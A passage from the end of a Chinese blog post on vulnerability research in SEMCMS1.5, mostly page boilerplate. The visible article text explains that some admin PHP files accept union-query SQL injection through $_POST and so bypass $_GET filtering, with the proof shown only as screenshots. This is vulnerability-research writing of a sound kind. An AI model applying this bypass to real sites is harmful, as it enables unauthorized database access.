<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220112230.png" alt="image-20220122011218148"></p>
<p><code>6gnGtg_Ali/Ant_Pro.php</code> 文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220112937.png" alt="image-20220122011259845"></p>
<p>以上这些文件都可以从 <code>$_POST</code> 传入注入内容以绕过本身对 <code>$_GET</code> 参数的过滤。</p>
<h4 id="证明-6">- 证明 -</h4>
<p>以 <code>6gnGtg_Ali/Ant_Info.php</code> 为例，直接从 <code>$_POST</code> 传入联合查询注入参数绕过 <code>$_GET</code> 的参数处理即可👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220050604.png" alt="image-20220122005055432"></p>
<p>成功地将数据回显注入出来了。</p>
<h2 id="总结">- 总结 -</h2>
<p>以上这些应该只是这个 <strong>CMS</strong> 的部分漏洞，可能还有一些没有提到，总之让人感觉就那种，属于挖的特别爽就是了0.0。另外，再提一下，本文仅供网站管理人员与渗透测试人员学习与交流，任何进行的一切未授权攻击行为与本人无关。</p>


        <hr>
        <!-- Pager -->
        <ul class="pager">
          
          <li class="previous">
            <a href="/posts/2586386993/" data-toggle="tooltip" data-placement="top" title="总结 - ctf中php的phar(一)">&larr; Previous Post</a>
          </li>
          
          
          <li class="next">
            <a href="/posts/1675626419/" data-toggle="tooltip" data-placement="top" title="漏洞挖掘 - thinkphp6序列化链(一)">Next Post &rarr;</a>
          </li>
          
        </ul>

        
        <!-- tip start -->
        <!-- tip -->
<!-- tip start -->
<div class="tip">
  <p>
    
      如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢 ！
    
  </p>
</div>
<!-- tip end -->

        <!-- tip end -->
        

        
        <!-- Sharing Srtart -->
        <!-- Social Social Share Post -->
<!-- Docs:https://github.com/overtrue/share.js -->

<div class="social-share" data-initialized="true" data-disabled="tencent ,douban ,qzone ,linkedin ,facebook ,google ,diandian" data-wechat-qrcode-helper="" align="center">
  <ul class="list-inline text-center social-share-ul">
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-twitter">
        <i class="fa fa-twitter fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a class="social-share-icon icon-wechat">
        <i class="fa fa-weixin fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-weibo">
        <i class="fa fa-weibo fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-qq">
        <i class="fa fa-qq fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon" href="mailto:?subject=漏洞挖掘 - SEMCMS1.5&body=Hi,I found this website and thought you might like it https://morblog.cc/posts/1286047278/">
        <i class="fa fa-envelope fa-1x" aria-hidden="true"></i>
      </a>
    </li>
  </ul>
</div>

<!-- css & js -->
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css"> -->
<script defer="defer" async="true" src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

        <!-- Sharing End -->
        
        <hr>

        <!-- comments start -->
        <!-- 1. gitalk comment -->


<!-- 2. gitment comment -->


<!-- 4. disqus comment -->

  <!-- disqus comment start -->

  <div class="comment">
    <div id="disqus_thread" class="disqus-thread"></div>
  </div>

  <!-- disqus embedded js code start (one page only need to embed once) -->
  <script type="text/javascript">
    /* * * CONFIGURATION VARIABLES * * */
    var disqus_shortname = "moryyds-1";
    var disqus_identifier = "https://morblog.cc/posts/1286047278/";
    var disqus_url = "https://morblog.cc/posts/1286047278/";

    (function () {
      var dsq = document.createElement('script');
      dsq.type = 'text/javascript';
      dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>
  <!-- disqus embedded js code start end -->

  <!-- disqus comment end -->


        <!-- comments end -->
        <hr>

      </div>

      <!-- Catalog: Tabe of Content -->
      <!-- Table of Contents -->

    
      <aside id="sidebar">
        <div id="toc" class="toc-article">
        <strong class="toc-title">目录</strong>
        
          <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link"><span class="toc-nav-number">1.</span> <span class="toc-nav-text">漏洞挖掘 - SEMCMS1.5</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-nav-number">1.1.</span> <span class="toc-nav-text">- 前言 -</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E5%89%8D%E5%8F%B0"><span class="toc-nav-number">1.2.</span> <span class="toc-nav-text">- 前台 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="toc-nav-number">1.2.1.</span> <span class="toc-nav-text">- SQL注入 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E7%94%A8%E6%88%B7%E6%B3%A8%E5%86%8C-%E7%99%BB%E5%BD%95-%E8%AE%A2%E9%98%85%E6%8F%90%E4%BA%A4-%E8%AF%84%E8%AE%BA%E6%8F%90%E4%BA%A4-%E7%BB%93%E7%AE%97%E9%A1%B5%E9%9D%A2-%E7%9B%B2%E6%B3%A8"><span class="toc-nav-number">1.2.1.1.</span> <span class="toc-nav-text">- 用户注册&#x2F;登录&#x2F;订阅提交&#x2F;评论提交&#x2F;结算页面(盲注) -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90"><span class="toc-nav-number">1.2.1.1.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E"><span class="toc-nav-number">1.2.1.1.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E6%89%A9%E5%B1%95"><span class="toc-nav-number">1.2.1.1.3.</span> <span class="toc-nav-text">- 扩展 -</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E7%94%A8%E6%88%B7%E5%9C%B0%E5%9D%80%E7%AE%A1%E7%90%86-%E7%9B%B2%E6%B3%A8"><span class="toc-nav-number">1.2.1.2.</span> <span class="toc-nav-text">-  用户地址管理(盲注) -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90-2"><span class="toc-nav-number">1.2.1.2.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E-2"><span class="toc-nav-number">1.2.1.2.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E8%AE%A2%E9%98%85%E6%8F%90%E4%BA%A4-%E7%9B%B2%E6%B3%A8"><span class="toc-nav-number">1.2.1.3.</span> <span class="toc-nav-text">- 订阅提交(盲注) -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90-3"><span class="toc-nav-number">1.2.1.3.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E-3"><span class="toc-nav-number">1.2.1.3.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li></ol></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E9%9A%90%E8%97%8F%E5%89%8D%E5%8F%B0"><span class="toc-nav-number">1.3.</span> <span class="toc-nav-text">- 隐藏前台 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#%E8%A1%A5%E5%85%85"><span class="toc-nav-number">1.3.1.</span> <span class="toc-nav-text">- 补充 -</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#RCE"><span class="toc-nav-number">1.3.2.</span> <span class="toc-nav-text">- RCE -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90-4"><span class="toc-nav-number">1.3.2.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E-4"><span class="toc-nav-number">1.3.2.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#SSRF"><span class="toc-nav-number">1.3.3.</span> <span class="toc-nav-text">- SSRF -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90-5"><span class="toc-nav-number">1.3.3.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E-5"><span class="toc-nav-number">1.3.3.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E6%89%A9%E5%B1%95-2"><span class="toc-nav-number">1.3.3.3.</span> <span class="toc-nav-text">- 扩展 -</span></a></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E5%90%8E%E5%8F%B0"><span class="toc-nav-number">1.4.</span> <span class="toc-nav-text">- 后台 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#SQL%E6%B3%A8%E5%85%A5-2"><span class="toc-nav-number">1.4.1.</span> <span class="toc-nav-text">- SQL注入 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90-6"><span class="toc-nav-number">1.4.1.1.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#%E8%AF%81%E6%98%8E-6"><span class="toc-nav-number">1.4.1.2.</span> <span class="toc-nav-text">- 证明 -</span></a></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-nav-number">1.5.</span> <span class="toc-nav-text">- 总结 -</span></a></li></ol></li></ol>
        
        </div>
      </aside>
    



      <!-- Sidebar Container -->
      <div class="
                col-lg-8 col-lg-offset-1
                col-md-10 col-md-offset-1
                sidebar-container">

        <!-- Featured Tags -->
        
        <section>
          <!-- no hr -->
          <h5>
            <a href="/tags/">标签</a>
          </h5>
          <div class="tags">
            
            <a class="tag" href="/tags/#安全" title="安全">安全</a>
            
            <a class="tag" href="/tags/#漏洞" title="漏洞">漏洞</a>
            
            <a class="tag" href="/tags/#PHP" title="PHP">PHP</a>
            
          </div>
        </section>
        

        <!-- Friends Blog -->
        
        <hr>
        <h5>朋友们</h5>
        <ul class="list-inline">

          
          <li>
            <a href="https://www.cnblogs.com/Yhck/" target="_blank">Yhck</a>
          </li>
          
          <li>
            <a href="https://www.cnblogs.com/wkzb/" target="_blank">beiwo</a>
          </li>
          
          <li>
            <a href="https://leohearts.com/" target="_blank">Leohearts</a>
          </li>
          
          <li>
            <a href="https://longlone.top/" target="_blank">Longlone</a>
          </li>
          
          <li>
            <a href="http://na0hblog.top/" target="_blank">Na0h</a>
          </li>
          
        </ul>
        
      </div>
    </div>
  </div>
</article>



<!-- anchorjs start -->
<!-- async load function -->
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script type="text/javascript">
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function(e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  };
</script>
<script type="text/javascript">
  //anchor-js, Doc:http://bryanbraun.github.io/anchorjs/
  async ("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js", function() {
    anchors.options = {
      visible: 'hover',
      placement: 'left',
      // icon: 'ℬ'
      icon: '❡'
    };
    anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
  });
</script>
<style>
  /* place left on bigger screen */
  @media all and (min-width: 800px) {
    .anchorjs-link {
      position: absolute;
      left: -0.75em;
      font-size: 1.1em;
      margin-top: -0.1em;
    }
  }
</style>

<!-- anchorjs end -->



		<!-- Footer (contains ThemeColor、viewer) -->
		<!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center">
          

          
            <li>
              <a target="_blank" href="https://github.com/Morouu">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          

          

          

          

          

        </ul>
        <p class="copyright text-muted">
         &copy; 2022
		 <i class="icon-smile"></i>
          morouu
          <br>
          Theme by
          <a target="_blank" rel="noopener" href="http://beantech.org">BeanTech</a>
          <span style="display: inline-block; margin: 0 5px;">
            <i class="fa fa-heart"></i>
          </span>
          re-Ported by
          <a target="_blank" rel="noopener" href="https://v-vincen.life/">Live My Life</a>
          |
          <iframe style="margin-left: 2px; margin-bottom:-5px;" frameborder="0" scrolling="0" width="91px" height="20px" src="https://ghbtns.com/github-btn.html?user=V-Vincen&repo=V-Vincen.github.io&type=star&count=true"></iframe>
        <div class=" copyright text-muted live_time"><span>本博客已萌萌哒地运行</span><span id="display_live_time"> 0 天 0 小时 0 分 0 秒</span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-12-27T20:23:15');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div>
		</p>
		
      </div>
    </div>
  </div>
</footer>

<a id="rocket" href="#top" class=""></a>


  <!-- jQuery -->
  <script type="text/javascript" src="/js/jquery.min.js"></script>
  <!-- Bootstrap Core JavaScript -->
  <script type="text/javascript" src="/js/bootstrap.min.js"></script>
  <!-- Custom Theme JavaScript -->
  <script type="text/javascript" src="/js/hux-blog.min.js"></script>
  <!-- catalog -->
  <script async="true" type="text/javascript" src="/js/catalog.js"></script>
  <!-- totop(rocket) -->
  <script async="true" type="text/javascript" src="/js/totop.js"></script>

  
    <!-- Busuanzi JavaScript -->
    <script async="async" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  
    <!-- Scroll start -->
    <script async="async" type="text/javascript" src="/js/scroll.js"></script>
    <!-- Scroll end -->
  

  
    <!-- LangSelect start -->
    <script type="text/javascript" src="/js/langselect.js"></script>
    <!-- LangSelect end -->
  

  
    <!-- Mouseclick -->
    <script type="text/javascript" src="/js/mouseclick.js" content='' color=''></script>
  

  
    <!-- ribbon -->
    <script type="text/javascript" src="/js/ribbonDynamic.js"></script>
  

  
    <!-- Line start -->
    <script async="text/javascript" src="/js/line.js"></script>
    <!-- Line end -->
  






  <!-- viewer start -->
  <!-- viewer start (Picture preview) -->
  
    <script async="async" type="text/javascript" src="/js/viewer/viewer.min.js"></script>
    <script async="async" type="text/javascript" src="/js/viewer/pic-viewer.js"></script>
  

  <!-- viewer end -->


<script>
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function (e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  }

  // fastClick.js
  async ("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function () {
    var $nav = document.querySelector("nav");
    if ($nav)
      FastClick.attach($nav);
    }
  )
</script>

<!-- Because of the native support for backtick-style fenced code blocks right within the Markdown is landed in Github Pages, From V1.6, There is no need for Highlight.js, so Huxblog drops it officially. -
https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0 - https://help.github.com/articles/creating-and-highlighting-code-blocks/ -->
<!-- <script> async ("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function () { hljs.initHighlightingOnLoad(); }) </script> <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet"> -->

<!-- jquery.tagcloud.js -->
<!-- <script> // only load tagcloud.js in tag.html if ($('#tag_cloud').length !== 0) { async ("https://morblog.cc/js/jquery.tagcloud.js", function () { $.fn.tagcloud.defaults = { // size: { start: 1, end: 1, unit: 'em' }, color: {
start: '#bbbbee', end: '#0085a1' } }; $('#tag_cloud a').tagcloud(); }) } </script> -->


		<!-- Search -->
		
		<div class="popup search-popup local-search-popup">
  <span class="popup-btn-close">
    ESC
  </span>
  <div class="container">
    <div class="row">
      <!-- <div class="col-md-9 col-md-offset-1"> -->
      <div class="col-lg-9 col-lg-offset-1 col-md-10 col-md-offset-1 local-search-content">

        <div class="local-search-header clearfix">

          <div class="local-search-input-wrapper">
            <span class="search-icon">
              <i class="fa fa-search fa-lg" style="margin: 25px 10px 25px 20px;"></i>
            </span>
            <input autocomplete="off" placeholder="搜索..." type="text" id="local-search-input">
          </div>
        </div>
        <div id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>


  
    <script src="/js/ziploader.js"></script>
  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.json";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    // monitor main search box;
    var onPopupClose = function (e) {
      $('.popup').fadeOut(300);
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $('.popup').fadeIn(300);
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }
    // get search zip version
    $.get('/searchVersion.json?t=' + (+new Date()), function (res) {
      if (localStorage.getItem('searchVersion') !== res) {
        localStorage.setItem('searchVersion', res);
        initSearchJson();
      }
    });

    function initSearchJson() {
      initLoad(['/search.flv'], {
        loadOptions: {
          success: function (obj) {
            localStorage.setItem('searchJson', obj['search.json'])
          },
          error: function (e) {
            return console.log(e)
          }
        },
        returnOptions: {
          'json': TYPE_TEXT
        },
        mimeOptions: {
          'json': 'application/json'
        }
      })
    }
    // search function;
    var searchFunc = function (search_id, content_id) {
      'use strict';
      isfetched = true;
      var datas = JSON.parse(localStorage.getItem('searchJson'));
      // console.log(search_id)
      var input = document.getElementById(search_id);
      var resultContent = document.getElementById(content_id);
      var inputEventFunction = function () {
        var searchText = input.value.trim().toLowerCase();
        var keywords = searchText.split(/[\s\-]+/);
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        var resultItems = [];
        if (searchText.length > 0) {
          // perform local searching
          datas.forEach(function (data) {
            var isMatch = false;
            var hitCount = 0;
            var searchTextCount = 0;
            var title = data.title
              ? data.title.trim()
              : '';
            var titleInLowerCase = title.toLowerCase();
            var content = data.content
              ? data.content.trim().replace(/<[^>]+>/g, "")
              : '';
            var contentInLowerCase = content.toLowerCase();
            var articleUrl = decodeURIComponent(data.url);

            var date = data.date;
            var dateTime = date.replace(/T/, " ").replace(/.000Z/, "");
            var imgUrl = data.header_img;
            


            var indexOfTitle = [];
            var indexOfContent = [];
            // only match articles with not empty titles
            keywords.forEach(function (keyword) {
              function getIndexByWord(word, text, caseSensitive) {
                var wordLen = word.length;
                if (wordLen === 0) {
                  return [];
                }
                var startPosition = 0,
                  position = [],
                  index = [];
                if (!caseSensitive) {
                  text = text.toLowerCase();
                  word = word.toLowerCase();
                }
                while ((position = text.indexOf(word, startPosition)) > -1) {
                  index.push({position: position, word: word});
                  startPosition = position + wordLen;
                }
                return index;
              }
              indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
              indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
            });
            if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
              isMatch = true;
              hitCount = indexOfTitle.length + indexOfContent.length;
            }
            // show search results
            if (isMatch) {
              // sort index by position of keyword
              [indexOfTitle, indexOfContent].forEach(function (index) {
                index.sort(function (itemLeft, itemRight) {
                  if (itemRight.position !== itemLeft.position) {
                    return itemRight.position - itemLeft.position;
                  } else {
                    return itemLeft.word.length - itemRight.word.length;
                  }
                });
              });
              // merge hits into slices
              function mergeIntoSlice(text, start, end, index) {
                var item = index[index.length - 1];
                var position = item.position;
                var word = item.word;
                var hits = [];
                var searchTextCountInSlice = 0;
                while (position + word.length <= end && index.length != 0) {
                  if (word === searchText) {
                    searchTextCountInSlice++;
                  }
                  hits.push({position: position, length: word.length});
                  var wordEnd = position + word.length;
                  // move to next position of hit
                  index.pop();
                  while (index.length != 0) {
                    item = index[index.length - 1];
                    position = item.position;
                    word = item.word;
                    if (wordEnd > position) {
                      index.pop();
                    } else {
                      break;
                    }
                  }
                }
                searchTextCount += searchTextCountInSlice;
                return {hits: hits, start: start, end: end, searchTextCount: searchTextCountInSlice};
              }
              var slicesOfTitle = [];
              if (indexOfTitle.length != 0) {
                slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
              }
              var slicesOfContent = [];
              while (indexOfContent.length != 0) {
                var item = indexOfContent[indexOfContent.length - 1];
                var position = item.position;
                var word = item.word;
                // cut out 100 characters
                var start = position - 20;
                var end = position + 80;
                if (start < 0) {
                  start = 0;
                }
                if (end < position + word.length) {
                  end = position + word.length;
                }
                if (end > content.length) {
                  end = content.length;
                }
                slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
              }
              // sort slices in content by search text's count and hits' count
              slicesOfContent.sort(function (sliceLeft, sliceRight) {
                if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                  return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                  return sliceRight.hits.length - sliceLeft.hits.length;
                } else {
                  return sliceLeft.start - sliceRight.start;
                }
              });
              // select top N slices in content
              var upperBound = parseInt('1');
              if (upperBound >= 0) {
                slicesOfContent = slicesOfContent.slice(0, upperBound);
              }
              // highlight title and content
              function highlightKeyword(text, slice) {
                var result = '';
                var prevEnd = slice.start;
                slice.hits.forEach(function (hit) {
                  result += text.substring(prevEnd, hit.position);
                  var end = hit.position + hit.length;
                  result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                  prevEnd = end;
                });
                result += text.substring(prevEnd, slice.end);
                return result;
              }
              var resultItem = '';

              // if (slicesOfTitle.length != 0) {   resultItem += "<li><a target='_blank' href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>"; } else {   resultItem += "<li><a target='_blank' href='" +
              // articleUrl + "' class='search-result-title'>" + title + "</a>"; } slicesOfContent.forEach(function (slice) {   resultItem += "<a target='_blank' href='" + articleUrl + "'><p class=\"search-result\">" + highlightKeyword(content, slice) +
              // "...</p></a>"; }); resultItem += "</li>";

              if (slicesOfTitle.length != 0) {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</div><time class='search-result-date'>" + dateTime + "</time>";
              } else {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + title + "</div><time class='search-result-date'>" + dateTime + "</time>";
              }
              slicesOfContent.forEach(function (slice) {
                resultItem += "<p class=\"search-result-content\">" + highlightKeyword(content, slice) + "...</p>";
              });
              resultItem += "</div><div class='search-result-right'><img class='media-image' src='" + imgUrl + "' width='64px' height='48px'></img></div></a>";

              resultItems.push({item: resultItem, searchTextCount: searchTextCount, hitCount: hitCount, id: resultItems.length});
            }
          })
        };

        if (keywords.length === 1 && keywords[0] === "") {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else if (resultItems.length === 0) {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else {
          resultItems.sort(function (resultLeft, resultRight) {
            if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
              return resultRight.searchTextCount - resultLeft.searchTextCount;
            } else if (resultLeft.hitCount !== resultRight.hitCount) {
              return resultRight.hitCount - resultLeft.hitCount;
            } else {
              return resultRight.id - resultLeft.id;
            }
          });
          var searchResultList = '<div class=\"search-result-list\">';
          resultItems.forEach(function (result) {
            searchResultList += result.item;
          })
          searchResultList += "</div>";
          resultContent.innerHTML = searchResultList;
        }
      }
      if ('auto' === 'auto') {
        input.addEventListener('input', inputEventFunction);
      } else {
        $('.search-icon').click(inputEventFunction);
        input.addEventListener('keypress', function (event) {
          if (event.keyCode === 13) {
            inputEventFunction();
          }
        });
      }
      // remove loading animation
      $('body').css('overflow', '');
      proceedsearch();
    }
    // handle and trigger popup window;
    $('.popup-trigger').click(function (e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc('local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });
    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function (e) {
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 && $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });

    document.addEventListener('mouseup', (e) => {
      var _con = document.querySelector(".local-search-content");
      if (_con) {
        if (!_con.contains(e.target)) {
          onPopupClose();
        }
      }
    });
  </script>


		
	<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/haru02.model.json"},"display":{"position":"right","width":225,"height":225,"right":125},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
